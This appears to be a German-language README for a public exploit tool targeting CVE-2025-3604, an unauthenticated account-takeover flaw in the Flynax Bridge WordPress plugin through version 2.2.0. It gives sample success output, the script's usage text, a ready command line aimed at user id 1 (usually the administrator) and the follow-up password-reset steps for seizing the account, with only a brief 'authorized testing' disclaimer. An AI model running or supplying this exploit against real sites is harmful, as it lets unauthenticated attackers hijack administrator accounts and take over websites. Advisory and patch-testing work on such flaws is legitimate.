
Flynax Bridge <= 2.2.0 - Nicht authentifizierte Privilegienausweitung durch Kontoübernahme
Das Flynax Bridge Plugin für WordPress ist in allen Versionen bis einschließlich 2.2.0 anfällig für Rechteausweitung durch Kontoübernahme.
Dies liegt daran, dass das Plugin die Identität eines Benutzers nicht ordnungsgemäß überprüft, bevor es dessen Kontodaten (z. B. E-Mail) aktualisiert. Infolgedessen können nicht authentifizierte Angreifer die E-Mail-Adresse beliebiger Benutzer, einschließlich Administratoren, ändern und dann einen Passwort-Reset einleiten, um das Konto vollständig zu übernehmen.
CVE: CVE-2025-3604
CVSS: 9.8 (Kritisch)
Veröffentlicht: 23. April 2025
Zuletzt aktualisiert: 24. April 2025
Detected plugin version: 2.2.0
Version is vulnerable. Attempting exploit...
Exploit succeeded! Email changed to: [email protected]
Exploit By Nxploited (Khaled_alenazi) | https://github.com/Nxploited
Nach erfolgreicher Ausnutzung kann der Angreifer zur WordPress-Anmeldeseite gehen und auf „Lost your password?“ klicken, um mit der neu gesetzten E-Mail das Passwort zurückzusetzen und vollen Zugriff auf das Zielkonto zu erhalten.
usage: CVE-2025-3604.py [-h] -u URL [-mail NEWMAIL] -id USER_ID
WordPress Flynax Bridge Unauthenticated Privilege Escalation via Account # By Nxploited (Khaled Alenazi)
options:
-h, --help show this help message and exit
-u, --url URL Target URL
-mail, --newmail NEWMAIL
New email to set
-id, --user_id USER_ID User ID to exploit
python3 CVE-2025-3604.py -u "http://TARGET/wordpress/" -id "1" -mail "[email protected]"
-u: Basis-URL der WordPress-Seite.-id: ID des anzugreifenden Benutzers (normalerweise 1 für Admin).-mail: Neue E-Mail, die für diesen Benutzer festgelegt wird.Nutzung auf eigene Gefahr. Nur für autorisierte Tests und zu Bildungszwecken.
Von: Nxploited ( Khaled_alenazi )